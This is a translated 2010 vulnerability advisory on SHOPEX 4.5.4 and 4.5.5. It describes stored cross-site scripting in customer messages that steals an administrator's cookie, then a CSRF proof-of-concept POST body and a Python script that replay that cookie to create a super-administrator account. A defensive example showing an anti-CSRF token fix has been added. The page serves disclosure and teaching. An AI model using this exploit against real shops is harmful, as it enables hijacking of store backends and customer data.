SHOPEX Cross-Site Scripting and CSRF Vulnerabilities - vulnerability warning - the black bar safety net

ID MYHACK58:62201027701
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-07-27T00:00:00


Cross-site request forgery is usually abbreviated CSRF or XSRF. An attacker uses a malicious script placed on a third-party web site, or a stand-alone program, to forge a request. There is no need to show the user any deceptive content: without the user's knowledge, the attacker uses the user's own browser to submit to the target application a data packet whose request parameters have been prepared in advance. In substance the attack hijacks the user's session state and forces the submission of a packet carrying the attacker's chosen "operation".

The key point, then, is the hijacking of the session state. The main cause of XSRF vulnerabilities is that the session state is maintained purely by an identity token that persists over time: when the session token is carried in an HTTP Cookie, the application should be more careful about determining who the current user is, rather than simply identifying the user from the Cookie value attached to the submitted packet. Put simply, every data exchange should carry a unique identifier for the submitted packet. Compared with XSS, XSRF attacks are far less well known, so resources for preventing them are scarce and prevention is difficult; for that reason XSRF is considered more dangerous than XSS.

The exploit:

1. A registered front-end user leaves a message after buying goods; when the administrator views it in the backend, the cross-site script fires.
2. Obtain the administrator's COOKIE information, then use the backend CSRF vulnerability to add an admin account.
3. After getting the COOKIE, use the PY script (see attachment).
4. Use the akt.py script to automatically add the management account Beijing with password Beijing, obtaining site backend administrator permissions.

Test demo: Figure 1


Figure 2


Figure 3


Figure 4

This yields the administrator's COOKIE information. For the CSRF part, a Firefox plugin can be used to POST the following POC code:

“op_id=&username=qing&userpass=qing&userpass_comfirm=amxking&super=1&status=1&name=&op_no=&department=&__a=1&memo=”

This is the request that adds an administrator; because of the CSRF vulnerability, the account can be added as long as we have the COOKIE.


```python
# -*- coding: cp936 -*-
# Python 2 script from the advisory: replays the backend operator-save request
# with the administrator COOKIE obtained through the cross-site scripting bug.
import sys, httplib

# POST body that creates a new super operator "qing" (same parameters as the POC above)
params = "op_id=&username=qing&userpass=qing&userpass_comfirm=qing&super=1&status=1&name=&op_no=&department=&__a=1&memo="
headers = {
    "Accept": "text/javascript, text/html, application/xml, text/xml, */*",
    "Referer": "",
    "Accept-Language": "zh-cn",
    "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
    "Host": "",  # target host left blank in the advisory
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
    ###### administrator COOKIE information obtained via XSS ######
    "Cookie": "SHOPEX_LOGIN_NAME=admin; SHOPEX_SID=e03e24ecc891260e6a281268eab26826"
}

con2 = httplib.HTTPConnection("")  # target host left blank in the advisory
con2.request("POST", "/shopadmin/index.php?ctl=admin/operator&act=save&_ajax=true&_h=315&_w=853&_wg=setting", params, headers)
r2 = con2.getresponse()
if r2.status == 200:
    print "Success", "\n"
else:
    print "Failed", "\n"
con2.close()
```
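The advisory's point is that the backend identifies the administrator from the Cookie value alone, so any request the browser decorates with that cookie is accepted. The following example is added here and is not the advisory's code nor SHOPEX's: it models the operator-save handler first as a cookie-only check and then as a version that also demands a per-session anti-CSRF token in the POST body. The in-memory stores, handler names, SERVER_SECRET and the `_csrf` field are assumptions; the cookie names and the POST body are the ones quoted on this page.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Hypothetical in-memory stores standing in for the shop's session and operator tables.
SESSIONS = {}   # SHOPEX_SID cookie value -> session record
OPERATORS = {}  # operator username -> {"super": bool}
SERVER_SECRET = secrets.token_bytes(32)  # assumed per-deployment secret, generated at start-up

def login(username, is_super):
    """Cookie-based login: returns the SHOPEX_SID value the browser will store."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": username, "super": is_super}
    return sid

def csrf_token(sid):
    """Per-session token (HMAC of the session id); the real admin form embeds it, a third-party page cannot read it."""
    return hmac.new(SERVER_SECRET, sid.encode(), hashlib.sha256).hexdigest()

def save_operator_vulnerable(cookies, body):
    """Cookie-only authorisation: a forged cross-site POST that the browser decorates with the cookie passes."""
    sess = SESSIONS.get(cookies.get("SHOPEX_SID"))
    if not sess or not sess["super"]:
        return 403
    params = parse_qs(body)
    OPERATORS[params.get("username", [""])[0]] = {"super": params.get("super", ["0"])[0] == "1"}
    return 200

def save_operator_hardened(cookies, body):
    """Same handler behind a per-session anti-CSRF token that must travel in the POST body."""
    params = parse_qs(body)
    presented = params.get("_csrf", [""])[0].encode()
    expected = csrf_token(cookies.get("SHOPEX_SID", "")).encode()
    if not hmac.compare_digest(presented, expected):
        return 403  # token missing or wrong: reject before any cookie-based authorisation
    return save_operator_vulnerable(cookies, body)

# Constructed scenario: the operator-save body quoted on this page, sent with the admin's cookie.
FORGED_BODY = ("op_id=&username=qing&userpass=qing&userpass_comfirm=qing&super=1"
               "&status=1&name=&op_no=&department=&__a=1&memo=")

def demo():
    sid = login("admin", True)
    cookies = {"SHOPEX_LOGIN_NAME": "admin", "SHOPEX_SID": sid}
    forged = save_operator_vulnerable(cookies, FORGED_BODY)  # 200: "qing" becomes a super operator
    blocked = save_operator_hardened(cookies, FORGED_BODY)   # 403: the forged body carries no token
    legit = save_operator_hardened(cookies, FORGED_BODY + "&_csrf=" + csrf_token(sid))  # 200
    return forged, blocked, legit
```

The forged request still arrives with the victim's SHOPEX_SID cookie in both versions; only the token, which the attacker's page cannot obtain, separates the admin's own form submission from the cross-site one.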

Author: Amxking & pluto
Vulnerable program: SHOPEX
Vulnerability type: cross-site scripting & CSRF
Affected versions: 4.5.4 and 4.5.5
Release time: 2010-07-18
Testing platform: Firefox browser plugin on WinXP SP3